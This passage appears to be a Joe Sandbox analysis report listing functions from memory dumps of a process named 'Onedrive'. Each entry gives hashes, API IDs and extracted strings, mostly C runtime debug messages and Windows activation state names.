                                                    • Instruction Fuzzy Hash: F4622C70218B488FDBA4DF18C488BA6B7E1FB98304F5546ADE58DD73A1CB70E945CB42
                                                    Function 000001729DD2C13F Relevance: .6, Instructions: 582COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb9f7026369abc2f533983e64922662aaf186562180a13f1a63ba32285e1e16d
                                                    • Instruction ID: ff06ba7e8e2b54852236382a00cd9d26c9086a23e07737af1ae8a6c0231decba
                                                    • Opcode Fuzzy Hash: eb9f7026369abc2f533983e64922662aaf186562180a13f1a63ba32285e1e16d
                                                    • Instruction Fuzzy Hash: 7912713121CA188FEB98DF1CC454BA6B7E1FB99304F580169D64DC7291CB74EC86DB92
                                                    Function 000001729DD20BDF Relevance: .2, Instructions: 237COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f703cd1896e92a8ea5974dddae7fbdbbbeff298064ce552387292163702aa10e
                                                    • Instruction ID: 10b3a47ccf595b57c77aec65090be32d3a9f53021582ed2f5680ca09d14d79cf
                                                    • Opcode Fuzzy Hash: f703cd1896e92a8ea5974dddae7fbdbbbeff298064ce552387292163702aa10e
                                                    • Instruction Fuzzy Hash: 3261F52612D2D54AD34E863848523FAFFE1DB97318F4CAAADF5CBC3283D41094879392
                                                    Function 00007FFDF3B0E310 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e48766748434b3bff571e46740c1065f90807cda6717c7d4accfc1540458af72
                                                    • Instruction ID: 2c40698e652a3e17a50b5c69ca4a79ae6f67bac53d71cc2ef63dfb40fb142f8c
                                                    • Opcode Fuzzy Hash: e48766748434b3bff571e46740c1065f90807cda6717c7d4accfc1540458af72
                                                    • Instruction Fuzzy Hash: 1B1165B27197418BEB56CF29E465726BBA0FB48344F41853AD9EC9B798DB3CD0408F00
                                                    Function 00007FFDF3AFBF7F Relevance: 70.4, APIs: 19, Strings: 21, Instructions: 417fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _invoke_watson_if_error$_aligned_msize$__vcrt_lock$FileWrite_wcsftime_l
                                                    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$minkernel\crts\ucrt\src\appcrt\misc\dbgrptt.cpp$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szOutMessage, 4096, szLineMessage)$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
                                                    • API String ID: 2594007075-2011695164
                                                    • Opcode ID: d03ea63f399c27827eb7d501663fc5a132353fde7f3ec8e3284bc11393ad2cfd
                                                    • Instruction ID: 9c4a2def2ecfc7f19a054a45a3aeebf84895ae148e8d08a83bdaba60ef8150db
                                                    • Opcode Fuzzy Hash: d03ea63f399c27827eb7d501663fc5a132353fde7f3ec8e3284bc11393ad2cfd
                                                    • Instruction Fuzzy Hash: 45421B72B18B8695E720DB11E4647EA73A0FB88344F810136D6AD5BAEDDF7CD544CB40
                                                    Function 00007FF63EA1C9F4 Relevance: 58.7, APIs: 19, Strings: 20, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: Cleanup$EvalNotify$GenericUnlicensed$IAActivationFailure$KernelExpiration$LastNotificationId$NeverActivated$NoProductKey$OEMCOAActivationFailure$OEMSLPActivationFailure$ReActivateRequired$RebootRequired$RepairRequired$TBLExpiring$TamperDetected$TimebasedExpired$VolumeBindingKMSNonSLP$VolumeBindingServiceNCount$VolumeRenewalRequired$VolumeUnlicensed
                                                    • API String ID: 2081463915-1899693706
                                                    • Opcode ID: de06abb46b7cc62a64efd2d5727dee8ebc6370a735e4bf0ffcbeb2d7c1986c94
                                                    • Instruction ID: 07dac00d7d64cef08bebf66f1d643741fc77c1e9649d4c06af5d6fac4be76fee
                                                    • Opcode Fuzzy Hash: de06abb46b7cc62a64efd2d5727dee8ebc6370a735e4bf0ffcbeb2d7c1986c94
                                                    • Instruction Fuzzy Hash: EC912671A0C6568AF7249F5294412786EA1BFB9B84FA08132E90EE7354DF7CE00DE725
                                                    Function 00007FFDF3B07EF0 Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 289memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$ComputeMallocaSchedulerScheduler::_Size$AllocaByteCharMarkMultiWide__crt_scoped_stack_ptr_freea_crtnew[]
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
                                                    • API String ID: 2182855091-1038314930
                                                    • Opcode ID: 4e5b80094f0f0fa01d2bbae1c9aa3c99a7f2f13ad5c29e15660c30839939a95b
                                                    • Instruction ID: ec375cffb536768e5978087174f4edae9ddcfd7a1740c27474dae6b7a2d42ada
                                                    • Opcode Fuzzy Hash: 4e5b80094f0f0fa01d2bbae1c9aa3c99a7f2f13ad5c29e15660c30839939a95b
                                                    • Instruction Fuzzy Hash: 53F1E272A0C6818AE760DB15E065BAEB7A0FBC4340F850135E6DD9BAD9DF7CE9448F40
                                                    Function 00007FFDF3B03910 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _aligned_msize_invoke_watson_if_error$_controlfp_sfegetenv
                                                    • String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
                                                    • API String ID: 436164602-1152488507
                                                    • Opcode ID: b18c9ca64db226cc6873a84e4e06ebe99eb580fab364faa48c7c8acdb43524ed
                                                    • Instruction ID: bdcf99cde76535be39df50a419612ef7119cd1ccdf583565f413579cf57a3073
                                                    • Opcode Fuzzy Hash: b18c9ca64db226cc6873a84e4e06ebe99eb580fab364faa48c7c8acdb43524ed
                                                    • Instruction Fuzzy Hash: DAA11872B0C78185E760DB15E4647AAB7A0EB84384F854136EAED5BAEDCF3CD548CB40
                                                    Function 00007FFDF3AEE6F0 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_CriticalHandleLock::_ModuleReentrantScoped_lockScoped_lock::~__invoke_watson_if_error
                                                    • String ID: File: $Line: $Module: $(*_errno())$...$@$@$Expression: $Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                    • API String ID: 2724354428-1800103407
                                                    • Opcode ID: 8adce8b2c13583390307289f89d3710f9b076da8aee81252e0d5781860522c7d
                                                    • Instruction ID: bad625860da31f7fc15f0267289404e31a8bdf3ee235e1a4b2f47f2d990b7629
                                                    • Opcode Fuzzy Hash: 8adce8b2c13583390307289f89d3710f9b076da8aee81252e0d5781860522c7d
                                                    • Instruction Fuzzy Hash: 2F02E332609BC694E7709B16E4A4BAAB3A4F788344F414136D6DD5BBACEF7CD184CB40
                                                    Function 00007FFDF3AEE010 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 296COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_CriticalHandleLock::_ModuleReentrantScoped_lockScoped_lock::~__invoke_watson_if_error
                                                    • String ID: File: $Line: $Module: $(*_errno())$...$@$@$Expression: $Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                    • API String ID: 2724354428-1800103407
                                                    • Opcode ID: 36cc416a54f125e35fa876ca446d39aa3a249108b265d09d6c5bebbafa260ccb
                                                    • Instruction ID: b3ea04e066e49c8af2ef49f2118c46acae9d86b90148ace065b7d76e16eb5ec2
                                                    • Opcode Fuzzy Hash: 36cc416a54f125e35fa876ca446d39aa3a249108b265d09d6c5bebbafa260ccb
                                                    • Instruction Fuzzy Hash: 9002E43260DBC694EB709B16E464BEAB3A4F788344F910135D6DD5ABA8DF7CD184CB40
                                                    Function 00007FFDF3AFBC30 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 123COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $__acrt_report_runtime_error$minkernel\crts\ucrt\src\appcrt\internal\report_runtime_error.cpp$wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"\n\n")$wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), message)$wcscpy_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)
                                                    • API String ID: 0-4242594854
                                                    • Opcode ID: bc5a43f3c3d65df8e7de82fba6ef7f3b101c2779c10b4b0d15b9a4aa5b4cf862
                                                    • Instruction ID: fde87f7498887e5ed7134e4e9a9d022a09f0ea4b02464e274bfc6a6263841d8b
                                                    • Opcode Fuzzy Hash: bc5a43f3c3d65df8e7de82fba6ef7f3b101c2779c10b4b0d15b9a4aa5b4cf862
                                                    • Instruction Fuzzy Hash: 7C513D61B18B4691EB10EB21E874BBA7360FB84784F811036E99D6B6EDDF3CE504C740
                                                    Function 00007FFDF3AD5FF0 Relevance: 35.4, APIs: 17, Strings: 3, Instructions: 384COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Frame$BlockHandler3::$StateUnwind$Affinity::operator!=BaseConcurrency::details::ControlEstablisherExceptionFac_nodeFac_node::_FeatureFileFromHandlerHandler4::HardwareHeaderImageIs_bad_exception_allowedMap::endMap::iterator::operator++PresentProcessorRaiseThrow_aligned_msizestd::_std::bad_alloc::bad_allocstd::exception::exceptionweak_ptr
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 4284016723-393685449
                                                    • Opcode ID: 5a4ceb812667750a209de0e60ec4dde58dbda67a3fc9bd25ab257cf73fe31e94
                                                    • Instruction ID: f56e5514ce58d0494e9e4d7c2d0b46981ff733716bbf7390924b6056017f0518
                                                    • Opcode Fuzzy Hash: 5a4ceb812667750a209de0e60ec4dde58dbda67a3fc9bd25ab257cf73fe31e94
                                                    • Instruction Fuzzy Hash: A5124C36A0CAC685DB709B16E0607EA7760FB89780F815036EA9D5BBEDDF2CD544CB00
                                                    Function 00007FF63EA1CE50 Relevance: 34.6, APIs: 11, Strings: 12, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: ENVIRONMENT$OEM_COA_NSLP$OEM_COA_SLP$OEM_DM$OEM_SLP$RETAIL$TIMEBASED_EVAL$TIMEBASED_PROMO$TIMEBASED_SUB$TIMEBASED_TRIAL$UXDifferentiator$VOLUME_KMS
                                                    • API String ID: 2081463915-2552240010
                                                    • Opcode ID: 7101f06e78257f19d75ce938753b12e85f23ac79d475b219decf489ddf843729
                                                    • Instruction ID: 9e2c713a575b8f9808f4eca19459efa1ff58a608608ad3ac437b5a06c76f030c
                                                    • Opcode Fuzzy Hash: 7101f06e78257f19d75ce938753b12e85f23ac79d475b219decf489ddf843729
                                                    • Instruction Fuzzy Hash: AC514871B0C696C7F6148B52A4402786BA1FFB5B81F819139EA0E97780DF3CE11EE321
                                                    Function 00007FF63EA16A40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CIDEdit1$CIDEdit2$CIDEdit3$CIDEdit4$CIDEdit5$CIDEdit6$CIDEdit7$CIDEdit8
                                                    • API String ID: 0-3748838404
                                                    • Opcode ID: 7197c68b65dc28501eec29134728e649a67480efd821c9b5258c505cbb260dff
                                                    • Instruction ID: f1f2eab9083706fafa6af67d8557f1d9302b145f3e18318fa0ee7dd6031c1d9f
                                                    • Opcode Fuzzy Hash: 7197c68b65dc28501eec29134728e649a67480efd821c9b5258c505cbb260dff
                                                    • Instruction Fuzzy Hash: A031A231D0C94AC6F710AB42EC541B46AA0BBB5705FC585B1E05EE23A0DF7CA94DE7B0
                                                    Function 00007FF63EA12BB0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 175threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Direct$Parser@$CreateElement@V12@$#100.Create@CurrentDescendent@Destroy@E__@@0@Element@2@1FindFromItemObjectQueueResource@ThreadUserV32@@Value@2@Work
                                                    • String ID: EnterNumber$LocationCombobox$PhoneActivation$TouchID
                                                    • API String ID: 3922143050-3457259764
                                                    • Opcode ID: e68c5357bdebdf1565543b18696b6f7c2650a5030905b38387725ce4b364b396
                                                    • Instruction ID: 08694f1409c5ef4b9347a95f8430ffe3315959cb64dc361caec079d48cbeb85f
                                                    • Opcode Fuzzy Hash: e68c5357bdebdf1565543b18696b6f7c2650a5030905b38387725ce4b364b396
                                                    • Instruction Fuzzy Hash: 2081FE25B09B4786EB009B66E4903796BA1EFB8B84F405031EA4ED7764DF3CE44CA720
                                                    Function 00007FFDF3AF6E90 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 202COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AF70B1
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF70E7
                                                      • Part of subcall function 00007FFDF3AF78D0: type_info::_name_internal_method.LIBCMTD ref: 00007FFDF3AF78F4
                                                      • Part of subcall function 00007FFDF3AF72C0: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AF72E0
                                                    • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AF71B7
                                                      • Part of subcall function 00007FFDF3AF7880: __CxxFrameHandler2.LIBCMTD ref: 00007FFDF3AF78B8
                                                    • _invoke_watson_if_error.LIBCMTD ref: 00007FFDF3AF7234
                                                    • __crt_unique_heap_ptr.LIBCMTD ref: 00007FFDF3AF727F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$FrameHandler2SchedulerScheduler::___crt_unique_heap_ptr_invoke_watson_if_errortype_info::_name_internal_method
                                                    • String ID: %ls$*$?$common_expand_argv_wildcards$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$result != nullptr$traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
                                                    • API String ID: 1749167088-976376051
                                                    • Opcode ID: 138c8daca875b3f42370243403c8f406affa96ab05b92cba4c20d7c4dcf060f6
                                                    • Instruction ID: 3107d6ceb76c942f107b37b87e52bee39583b9b6d255657bcf7de2d6d4113b3e
                                                    • Opcode Fuzzy Hash: 138c8daca875b3f42370243403c8f406affa96ab05b92cba4c20d7c4dcf060f6
                                                    • Instruction Fuzzy Hash: 21B1043261CBC185E7609B26E4A0BAEB7A4FB84380F514136E69D5BBE9DF3DD444CB40
                                                    Function 00007FFDF3AE9460 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FFDF3AE93E0: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AE9427
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AE94B0
                                                      • Part of subcall function 00007FFDF3AD39B0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AD39BE
                                                    • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FFDF3AE9514
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AE955E
                                                    • __crt_unique_heap_ptr.LIBCMTD ref: 00007FFDF3AE9579
                                                      • Part of subcall function 00007FFDF3AD85F0: __crt_unique_heap_ptr.LIBCMTD ref: 00007FFDF3AD85FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$CriticalLock::_ReentrantSchedulerScheduler::_Scoped_lockScoped_lock::~___crt_unique_heap_ptr$__crt_scoped_stack_ptr
